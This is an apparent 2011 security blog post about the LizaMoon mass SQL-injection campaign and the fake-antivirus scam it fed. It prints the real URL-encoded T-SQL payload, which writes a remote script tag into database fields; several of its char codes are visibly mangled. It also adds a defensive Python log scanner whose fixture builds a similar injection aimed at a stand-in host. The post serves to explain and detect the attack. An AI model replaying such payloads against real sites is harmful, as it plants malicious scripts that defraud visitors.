
LizaMoon Is Back On The Security RADAR

April 1st, 2011
LizaMoon is a Mass-Injection Attack that is not new, but is currently getting security attention again. Using Google’s search results as a weak indicator of scope and severity, LizaMoon appears to be a significant threat. Over 1.5 million URLs have links with the same attack mechanisms as the original attack, and half a million include a script pointing to the lizamoon.com site, which Google has listed as harmful.
GOOGLE WARNINGS
If you browse to a website that Google has previously listed as harmful, you may see the following warning before any content is loaded.
Google Harmful Web Site Warning for LizaMoon

You can find Google-indexed websites that contain the injected code using the following search link. This link is little more than a search for a fragment of the injected code, and will simply list some affected sites in a Google Search Results page.

http://www.google.com/search?client=safari&rls=en&q=%22%3Cscript+src=http://*/ur.php&ie=UTF-8&oe=UTF-8

INJECTIONS
The LizaMoon attack is carried out through Code/SQL Injection, like the sample below. You can learn more about SQL Injections, Cross-Site Scripting (XSS) and other attack methods at http://blog.emagined.com/2010/03/22/top-ten-most-critical-web-application-security-vulnerabilities/

Injection attacks can be performed successfully on websites that have not been sufficiently protected via methods such as Data Cleansing and Data Validation. Our article on “Are My Website Forms At Risk For Being Hacked?” may provide more answers about forms and security related to server-side handling of submitted data.

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar60)%2B
char(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar115)
%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2
Bchar(5)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)
%2Bchar101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)
%2Bchar(4)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)
%2Bchar114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)
%2Bchar(11)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+
varchar(8000)),cast(char(32)+as+varchar(8)))–
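
For defenders reviewing web server logs, the following is an added example (not part of the original article) that URL-decodes each request, turns char(N)+char(N) runs like the ones in the sample above back into text, and reports any run that spells out a script tag. The log lines, IP addresses, page names and the injected.example host are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# A single T-SQL char(N) call, and a run of two or more joined by '+'.
CHAR_CALL = re.compile(r"char\((\d{1,3})\)", re.I)
CHAR_RUN = re.compile(r"char\(\d{1,3}\)(?:\s*\+\s*char\(\d{1,3}\))+", re.I)
SCRIPT_SRC = re.compile(r"<script\s+src=([^\s>]+)", re.I)

def decode_char_runs(text):
    """URL-decode text and return each char(N)+char(N)... run as a string."""
    decoded = unquote_plus(text)  # '+' becomes a space, %2B becomes '+'
    return ["".join(chr(int(n)) for n in CHAR_CALL.findall(m.group(0)))
            for m in CHAR_RUN.finditer(decoded)]

def scan_log(lines):
    """Return (line_number, script_src) for requests hiding a script tag."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for literal in decode_char_runs(line):
            match = SCRIPT_SRC.search(literal)
            if match:
                hits.append((number, match.group(1)))
    return hits

def constructed_sample_log():
    """Constructed access-log lines; host, paths and IPs are made up."""
    tag = "</title><script src=http://injected.example/ur.php></script>"
    encoded = "%2B".join(f"char({ord(c)})" for c in tag)  # test fixture only
    attack = ("/news.asp?id=7+update+Table+set+FieldName=REPLACE(cast(FieldName"
              f"+as+varchar(8000)),cast({encoded}+as+varchar(8000)),"
              "cast(char(32)+as+varchar(8)))--")
    return [
        '192.0.2.10 - - [01/Apr/2011:10:00:01 +0000] "GET /news.asp?id=7 HTTP/1.1" 200 5120',
        f'192.0.2.44 - - [01/Apr/2011:10:00:02 +0000] "GET {attack} HTTP/1.1" 200 5120',
        '192.0.2.10 - - [01/Apr/2011:10:00:03 +0000] "GET /search.asp?q=char(65) HTTP/1.1" 200 900',
    ]

if __name__ == "__main__":
    for number, src in scan_log(constructed_sample_log()):
        print(f"line {number}: injected script source {src}")
```

A hit identifies both the request that attempted the injection and the script host to look for in database fields and rendered pages.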

THE SECURITY EXPLOIT
The LizaMoon Attack is a traditional antivirus scam (AV Scam). When your browser is redirected to the rogue site for the attack, a window may pop up indicating your computer has harmful problems that need to be repaired. Unprepared users who buy into the obviously bogus content will be offered false comfort with the Windows logo and a generally nice layout, indicating a professional website and store. Submitting your credit card information carries the expected caveats and downsides!

WebSense Labs Video About LizaMoon

SOME INFECTED URLs
